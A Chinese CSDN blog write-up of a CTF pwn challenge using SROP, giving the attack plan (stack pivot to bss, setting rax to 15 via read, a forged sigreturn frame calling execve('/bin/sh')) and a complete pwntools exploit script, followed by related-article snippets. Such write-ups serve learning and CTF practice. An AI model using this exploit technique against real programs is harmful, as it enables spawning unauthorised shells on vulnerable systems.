记一道srop题,复习一波srop

最新推荐文章于 2023-03-19 18:49:39 发布
最新推荐文章于 2023-03-19 18:49:39 发布
阅读量195 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51474381/article/details/116448601
版权

1.一眼就知道是srop

什么都没有,就有这麽点东西。栈溢出+syscall

2.利用思路

1.栈迁移到bss上,就不用泄露栈地址了。

2.写入'/bin/sh\x00'和伪造的frame,再次调用read,利用read的返回值控制rax。

3.再次read时,控制rax为15,此时会触发syscall,直接执行execve(/bin/sh)。

 

exp:

from pwn import *

small = ELF('./small')
sh = process('./small')
context.arch = 'amd64'
context.log_level = 'debug'

sh_address=0x402000
syscall_ret=0x40102b
frame = SigreturnFrame()
frame.rax = 59
frame.rdi = sh_address
frame.rsi = 0
frame.rdx = 0 
frame.rip = syscall_ret


sh.send('a'*0x10+p64(0x402010)+p64(0x401015))
pause()
sh.send('/bin/sh\x00'+'a'*0x8+p64(0x402018)+p64(0x401015)+p64(syscall_ret)+str(frame))

pause()
sh.send('a'*15)
sh.interactive()

 

NN小弟
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SROP 32位--Fun with SROP Exploitation
MillionSky的专栏
03-19 396
1 概述本文是这篇文章的笔:Fun with SROP Exploitationhttps://v0ids3curity.blogspot.jp/2015/06/fun-with-srop-exploitation.html 环境:Ubuntu 16.042 程序nasm -felf32 vuln_s.asmld vuln_s.o -melf_i386 -o vuln_s millionsky@...
SROP基本原理和利用
MillionSky的专栏
03-19 6883
1 概述SROP: Sigreturn Oriented Programming ,系统Signal Dispatch之前会将所有寄存器压入,然后调用signal handler,signal handler返回时会将的内容还原到寄存器。 如果事先填充,然后直接调用signal handler,那在返回的时候就可以控制寄存器的值。2 资源1. Framing Signals—A Return...
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 475
SROP学习,例 smallest ,ciscn_s_3
劫持 64 位静态程序 fini_array 进行 ROP 攻击
SkYe's Blog
09-13 750
[scode type=“lblue”]2020年8月6日 标添加“静态程序”,补充与 64 位动态程序对比和利用方法差异小结[/scode] 程序起点 程序的启动流程如图所示: 可以看到 main 函数不是程序起点,之前写的 格式化字符串盲打 也分析过 text 段起点是 _start 函数 。_start 函数调用__libc_start_main 完成启动和退出工作。具体看看 _start 函数: .text:0000000000401A60 public star
计算机组成原理SRop,计算机组成原理历年真
weixin_28872105的博客
07-22 1420
C.内部异常的响应发生在指令执行过程中D.内部异常处理的返回到发生异常的指令继续执行43. (13分)某16位计算机主存按字节编码。存取单位为16位;采用16位定长指令格式;CPU采用单总线结构,主要部分如下图所示。图中R0~R3为通用寄存器;T为暂存器;SR为移位寄存器,可实现直送(mov)、左移一位(left)、右移一位(right)3种操作,控制信号为Srop,SR的输出信号Srout控制;...
CTF wiki srop 学习
m0_57754423的博客
03-04 345
参考wiki,hollk师傅博客。 说一下我的个人理解,当题目中没有足够的gadget ,可以直接或者间接控制rax,题目中有syscall就可以利用这种攻击手法。 srop: 在unix系统发生signal的时候会执行sigreturn 系统调用。 signal机制: signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。 介绍: 1.内核向某个程序中发送signal机制
SROP 32位DEMO
MillionSky的专栏
03-19 530
1 概述开始学习SROP技巧。希望找到一个简单的demo来了解SROP。找了很多资料,但都没有实作成功。主要参考这篇文章1. Sigreturn Oriented Programming攻击简介https://www.anquanke.com/post/id/85810直接拿原文中的程序测试,没有复现成功,主要的问有:1. VDSO的爆破不成功,GDB调试发现对应的位置没有找到对应的指令:sig...
SROP
热门推荐
钞sir的博客
12-20 1万+
简介 SROP的全称是Sigreturn Oriented Programming,这是ROP攻击方法中的一种,其中sigreturn是一个系统调用,在类unix系统发生signal的时候会被间接地调用;在传统的ROP攻击中我们需要寻找大量的gadgets来对寄存器进行赋值已达到我们的需求,而SROP可以减少我们寻找gadgets的难度… 前置知识 signal 机制 我们都知道在Linux中,系...
计算机组成原理SRop,【9A文】计算机组成原理历年真.docx
weixin_36310141的博客
07-22 304
【9A文】计算机组成原理历年真.docx (30页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦!9.90 积分【MeiWei_81重点借鉴文档】20RR年计算机统考——计算机组成原理部分11.冯·诺依曼计算机中指令和数据均以二进制形式存放在存储器中,CPU区分它们的依据是。A.指令操作码的译码结果B.指令和数据的寻址方式C.指令周期的不同阶段D.指...
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
4. **SROP(Signal-to-Residual-Orthogonal-Part)**:SROP是一种用于评估OFDM系统性能的指标,特别是在存在信道衰落的情况下。它关注的是信号能量与剩余正交部分的能量之比,可以帮助分析系统的抗干扰能力和信噪比...
201608010219-罗枭鸿-练习1
08-04
冯诺依曼计算机指令系统和Cache存储器 在冯诺依曼计算机中,指令和数据都是以二进制形式存放在存储器中。CPU 区别它们的依据是指令操作码的译码结果。...控制信号 AULop 和 Srop 是用于控制 ALU 和 SR 的操作。
2015年联考《408计算机学科专业基础综合》真答案.pdf
01-10
题目中提到ALU有7种操作模式,ALUop有3种模式,SRop也有3种模式,这表明ALU能够支持多种不同的运算操作。 - **SRout**:SRout可能是SR(Shift Register移位寄存器)的输出结果,通常用于表示移位寄存器的输出值。 ...
csapplab:学习csapp
04-04
不过效率还挺高的,嘿嘿,学了泄露libc的一个工具Dynelf,堆的fastbin attack的一部分(大致了解了相关概念(fastbin,smallbin,largebin)的结构和malloc,free的过程),还学了srop迁移,fakeframe(这个原理...
带exp的pwn测试文件
09-12
在IT安全领域,尤其是逆向工程和漏洞利用中,“pwn”一词通常指的是攻破或控制程序的行为。本主的“带exp的pwn测试文件”是指一系列用于测试和学习漏洞利用技术的文件,其中“exp”代表exploit,即漏洞利用程序。...
多元宇宙算法MVO-Kmean-Transformer-LSTM负荷预测【含Matlab源码 6773期】.zip
08-02
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化Kmeans-Transformer-lstm分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化Kmeans-Transformer-lstm预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化Kmeans-Transformer-lstm预测 4.4.3 灰狼算法GWO/狼群算法WPA优化Kmeans-Transformer-lstm预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化Kmeans-Transformer-lstm预测 4.4.5 萤火虫算法FA/差分算法DE优化Kmeans-Transformer-lstm预测 4.4.6 其他优化算法优化Kmeans-Transformer-Lstm预测
大型企业数字化转型发展趋势汇报方案.docx
08-02
大型企业数字化转型发展趋势汇报方案.docx
【中科院1区】Matlab实现非洲秃鹫优化算法AVOA-RF故障诊断算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
java-springboot+vue古典舞在线交流平台的设计与实现源码(项目源码-说明文档)
08-02
java-springboot+vue古典舞在线交流平台 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:Springboot 前端技术:Vue、HTML5、css、JavaScript 关键技术:springboot、vue、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
srop的基本原理是什么
03-03
SROP(Sigreturn-Oriented Programming)是一种利用信号处理函数(signal handler)来执行攻击代码的技术。攻击者通过利用程序中的漏洞,将程序状态中的寄存器值篡改成指向一个虚假的信号处理函数,并且在这个虚假的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值